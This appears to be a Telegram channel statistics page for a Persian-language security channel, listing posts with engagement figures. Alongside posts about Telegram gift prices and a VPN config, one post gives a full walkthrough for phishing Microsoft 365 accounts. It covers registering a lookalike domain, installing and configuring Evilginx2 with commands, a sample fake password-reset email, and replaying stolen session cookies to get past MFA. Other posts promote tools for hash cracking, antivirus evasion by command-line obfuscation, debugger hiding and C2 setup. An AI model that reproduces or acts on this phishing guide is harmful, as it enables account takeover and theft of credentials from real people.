ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ
описание
Dear @durov In this channel there isn't any content that violates copyright laws. Contents of this channel are for helping people. Please ignore traitors reports. Thank yo ❗️ هر استفاده نادرست به عهده خود شخص میباشد ❗️
4 206
подписчиков
Охват к подписчикам
122,5%
ERR
Реакции к просмотрам
77,79%
80,2 тыс на 20 постов
Пересылки к просмотрам
0,09%
97
Постов в день
0,0
всего 21
Где отзываются чаще
доля реакций к просмотрам- 5 нояб.🔥 ایده و کانسپت من برای گیفتهای مناسبتی: سوزاندن گیفتهای قدیمی برای خرید گیفتهای جدید. از اونجایی که احتمالاً قراره بینهایت گیفت مناسبتی داشته باشیم، به نظرم خیلی خوب میشه اگه خرید بعضی از این گیفتها نیاز به سوزوندن گیفتهای قدیمی همون مناسبت داشته باشه. 📈 مثلاً برای خرید گیفت 🎁 در ولنتاین، کاربر ابتدا باید یکی از گیفتهای 🎁 یا 🎁 که مربوط به ولنتاین قبلی بودن رو بسوزونه و سپس با پرداخت استارز گیفت جدید رو بخره. • چرا ایده خوبیه؟ - از خرید انبوه رباتها خلاص میشیم. - ساپلای گیفتهای قدیمی کم میشه. - هربار گیفت جدید میاد به جای اینکه گیفتهای قدیمی فراموش و بیارزش بشن، ارزششون بالاتر میره. - سوزوندن صرفا قفل خریدن رو باز میکنه و نیازه که بعدش استارز پرداخت بشه، پس تلگرام ضرری نمیکنه و همه چیز دو سر سود هست.444,49%
- 20 мар.عیدتون مبارک ❤️ ۱ سال دیگه هم زنده ماندیم 🔥408,27%
- 12 сент. 2025 г.🔥 برای دریافت قیمت گیفت خود کافی است لینک گیفت را ارسال کنید. مانند: t.me/nft/VintageCigar-10319 💥 یا اسم گیفت را به همراه علامت سوال وارد کنید. مانند: Pepe? 🆔 @EX_Panel_Bot 🆔87,54%
- 29 авг. 2025 г.🔎Searches Hash APIs to crack your hash quickly🔎 If hash is not found, automatically pipes into HashCat⚡ https://github.com/bee-san/Search-That-Hash ⚜️ @Expire_Security ⚜️80,42%
- 5 нояб.🔥 ایده و کانسپت من برای گیفتهای مناسبتی: سوزاندن گیفتهای قدیمی برای خرید گیفتهای جدید. از اونجایی که احتمالاً قراره بینهایت گیفت مناسبتی داشته باشیم، به نظرم خیلی خوب میشه اگه خرید بعضی از این گیفتها نیاز به سوزوندن گیفتهای قدیمی همون مناسبت داشته…9,19%
- 10 июн. 2025 г.⭐️دسترسی به حساب Microsoft 365 که با رمز عبور و تایید دومرحلهای MFA محافظت شده بدون نیاز به داشتن رمز یا عبور از MFA مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت کاری که میکنیم یه دامنه تقلبی ثبت میکنیم مثلا m1crosoft-support.com به جای حرف i از عدد 1 استفاده کردیم این دامنه باعث میشه کاربر فکر کنه وارد سایت اصلی مایکروسافته دامنه رو از یه جایی میخریم که گواهی امنیتی رایگان HTTPS میده مثل Namecheap Porkbun تنظیم میکنیم که این دامنه به سرور ما VPS وصل بشه مرحله ۲ راهاندازی ابزار Evilginx2 روی سرور Evilginx2 یه ابزار فیشینگ حرفهایه که کمک میکنه بدون نیاز به رمز یا MFA توکن ورود Session Token قربانی رو بدزدیم ما یک سرور مجازی میخوایم یه ایپی پابلیک داشته باشه نصب ابزارها با دستور sudo apt update && sudo apt install git make gcc certbot -y git clone https://github.com/kgretzky/evilginx2.git cd evilginx2 make sudo ./bin/evilginx تنظیمات اولیه برای دامنه config domain m1crosoft-support.com config ip آی پی سرور شما config redirect_url https://login.microsoftonline.com config site microsoft enable microsoft گرفتن گواهی امنیتی HTTPS رایگان sudo certbot certonly --manual -d m1crosoft-support.com --preferred-challenges dns و بعد فایلهای امنیتی رو به Evilginx2 معرفی میکنیم config certpath /etc/letsencrypt/live/m1crosoft-support.com/fullchain.pem config keypath /etc/letsencrypt/live/m1crosoft-support.com/privkey.pem مرحله ۳ فرستادن ایمیل جعلی فیشینگ به کاربر هدف هدف اینه که کاربر روی لینک جعلی کلیک کنه نمونه متن ایمیل میتونه به این صورت باشه موضوع : مهم تغییر اجباری رمز حساب Microsoft 365 کاربر گرامی برای امنیت بیشتر حساب شما لطفا با کلیک روی لینک زیر رمز عبور خود را تغییر دهید https://m1crosoft-support com/auth ترفندهایی که میتونیم بزنیم: جعل فرستنده ایمیل طوری که از طرف Microsoft به نظر برسه استفاده از لینکهای کوتاه یا QR Code برای پنهان کردن لینک جعلی ارسال ایمیل در ساعات اداری برای افزایش احتمال کلیک مرحله ۴ دزدیدن Session Token بعد از کلیک کاربر وقتی کاربر روی لینک کلیک میکنه سایت جعلی ما باز میشه Evilginx2 اطلاعات ورود کاربر رو میگیره ولی همزمان کاربر واقعا وارد Microsoft میشه در پشت صحنه ما توکنهای ورود Session Token رو از مرورگر کاربر میگیریم مثلا چیزی شبیه این توی لاگها ظاهر میشه Captured new credentials Username user@company.com Session Tokens {...} مرحله ۵ ورود به حساب Microsoft 365 بدون رمز یا MFA الان که توکنها رو داریم نیازی به رمز عبور یا تایید MFA نیست برای استفاده از توکن مرورگر مثلا Chrome رو باز کن یه تب مخفی incognito باز کن برو به DevTools F12 تب Application بخش Cookies مقادیر توکن کاربر که از Evilginx گرفتی رو به کوکیها اضافه کن صفحه Microsoft 365 رو ریفرش کن ورود موفقیت آمیز بدون رمز و بدون MFA انجام میشه #red_team #phising #Evilginx2 ⚜️ @Expire_Security ⚜️0,21%
- 10 июн. 2025 г.مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت0,16%
- 29 июл. 2025 г.⭕️ وب سرویس پیشرفته قیمت گیفت ⭕️ ⚙هم قیمت پورتال میده هم تونل و هم مارکت🔵 🕦 تغییرات ۲۴ ساعته و هفتگی 🕦 🖥 نمایش مقدار سود ضرر گیفت 🖥 😵🤔🙁😝 @Dev_Clown 😤☹️🙁☹️0,11%
- 28 мая 2025 г.دور زدن آنتیویروس با مبهمسازی خط فرمان command line obfuscation یک تکنیک حرفه ای برای فرار از شناسایی سیستمهای امنیتی یه پژوهشگر امنیت سایبری به نام Wietze Beukema نشون داده که چطور میشه با ترفندهایی ساده ولی خلاقانه دستورات خط فرمان ویندوز رو طوری نوشت که کار همیشگی رو انجام بدن ولی توسط ابزارهای امنیتی مثل انتی ویروس ها و EDR شناسایی نشن چطوری ممکنه؟ بعضی از برنامههای سیستمی ویندوز به دلیل طراحی خاص یا قدیمی بودن پارامترهای دستوری رو به شکلهای مختلف می پذیرن مثلاً: استفاده از / بهجای - وارد کردن کاراکترها با فرمت یونیکد (مثل U+2044 بهجای /) یا ترکیبهای نا اشنا که همچنان معتبر هستن ابزار ArgFuscator: Beukema برای راحتتر شدن کار یه ابزار ساخته به اسم ArgFuscator که میتونه این دستورات مبهم شده رو تولید کنه این ابزار برای تست سیستمهای دفاعی خیلی مفیده لینک مقاله + ابزار: https://www.wietzebeukema.nl/blog/bypassing-detections-with-command-line-obfuscation ⚜️ @Expire_Security ⚜️0,10%
- 3 июн. 2025 г.TitanHide چیه؟ یه درایوره که کمک میکنه دیباگر (Debugger) رو از دید بعضی برنامهها مخفی کنی با یه ترفندهایی توی کرنل ویندوز (مثل هوک کردن توابع سیستمی) کاری میکنه برنامه نفهمه داره دیباگ میشه فقط کافیه id پردازش و گزینههایی که میخوای مخفی بشن رو بهش بدی خودش بقیه کارها رو میکنه https://github.com/mrexodia/TitanHide ⚜️ @Expire_Security ⚜️0,08%
- 16 мая 2025 г.یک رول Ansible که وظیفه اش نصب و راهاندازی Adaptix C2 (هم سرور و هم کلاینت) روی سیستم های مبتنی بر Debian/Ubuntu هست https://github.com/badsectorlabs/ludus_adaptix_c2 ⚜️ @Expire_Security ⚜️0,04%
- 9 авг.❤️ این کانفیگ رو تست کنین و نظرتون رو دربارهش بگین vless://ab3509a5-c256-4695-ac9b-9274b5637a06@ex.gredline.com:8443?security=reality&encryption=none&pbk=cx644M9eiVcGXDDycUOdinqiCd91BoQYxbuVw8ieFXo&headerType=none&fp=chrome&spx=%2F4344df807f7779d&type=tcp&flow=xtls-rprx-vision&sni=www.cloudflare.com&sid=3a25a573cc#RuzVPN0,00%